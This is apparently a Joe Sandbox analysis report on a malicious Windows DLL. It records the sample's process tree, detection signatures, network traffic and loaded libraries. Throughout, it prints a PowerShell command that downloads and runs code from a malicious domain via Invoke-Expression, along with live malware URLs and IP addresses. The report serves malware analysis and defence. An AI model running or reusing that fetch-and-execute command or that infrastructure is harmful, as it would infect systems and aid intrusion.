Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll

Overview

General Information

Sample name:SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll
(renamed file extension from exe to dll)
Original sample name:SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.exe
Analysis ID:1446067
MD5:7e730829ca817bbf6ad9e7d6b6aa0eb0
SHA1:0564905a3f32aba7b00d41ce4a60f7dce6b33b42
SHA256:a683ad754bdeea6485f3b7b45319c4b6b5e82aecb6fe6fc801716192d8b2d2c0
Tags:exe
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Machine Learning detection for sample
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Windows Binaries Write Suspicious Extensions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 5320 cmdline: loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3668 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 4024 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • WerFault.exe (PID: 5752 cmdline: C:\Windows\system32\WerFault.exe -u -p 4024 -s 424 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 5836 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 6396 cmdline: C:\Windows\system32\WerFault.exe -u -p 5836 -s 416 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7244 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7336 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7600 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hash MD5: EF3179D498793BF4234F708D3BE28633)
      • WerFault.exe (PID: 7672 cmdline: C:\Windows\system32\WerFault.exe -u -p 7600 -s 416 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • rundll32.exe (PID: 7608 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpen MD5: EF3179D498793BF4234F708D3BE28633)
      • mshta.exe (PID: 7732 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Script Interpreter Execution From Suspicious Folder
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7244, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ProcessId: 7336, ProcessName: mshta.exe
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7336, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7460, ProcessName: powershell.exe
Sigma detected: Windows Binaries Write Suspicious Extensions
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\rundll32.exe, ProcessId: 7244, TargetFilename: c:\users\public\example.hta
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7336, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk'), ProcessId: 7460, ProcessName: powershell.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://iapartmentlistings.com/tykhwuxkAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtAvira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4Avira URL Cloud: Label: malware
Source: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtKAvira URL Cloud: Label: malware
Machine Learning detection for sample
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 194.124.213.167:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Joe Sandbox ViewIP Address: 194.124.213.167 194.124.213.167
Source: Joe Sandbox ViewIP Address: 91.222.173.38 91.222.173.38
Source: Joe Sandbox ViewASN Name: KICUA-ASGI KICUA-ASGI
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.siguefutbol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-automatic/d.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.siguefutbol.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /tykhwuxk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: iapartmentlistings.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: www.siguefutbol.com
Source: global trafficDNS traffic detected: DNS query: iapartmentlistings.com
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/
Source: rundll32.exe, rundll32.exe, 0000000C.00000002.2042532242.000001E645C32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2067339050.000001F4265D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt3
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645CA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt4
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645BC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.2042532242.000001E645BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txt5
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645C32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtK
Source: rundll32.exe, 00000003.00000002.2276044062.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2251145604.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.2263775399.00007FF8BFAB4000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllString found in binary or memory: https://www.siguefutbol.com/wp-content/plugins/wp-automatic/d.txtmshtaopen3a413cab4a1b175a1b32871e89
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownHTTPS traffic detected: 194.124.213.167:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4024 -s 424
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: Number of sections : 11 > 10
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engineClassification label: mal64.winDLL@27/21@2/2
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txtJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5836
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4024
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7600
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\d1e1dce6-0688-454a-98a2-cb12f37158f1Jump to behavior
Source: SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\rundll32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash
Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll"
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hash
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4024 -s 424
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5836 -s 416
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpen
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hash
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpen
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7600 -s 416
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,hashJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll,xlAutoOpenJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",hashJump to behavior
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",xlAutoOpenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W64.Agent.HHB.gen.Eldorado.13313.26301.dll",#1Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')Jump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshtaJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
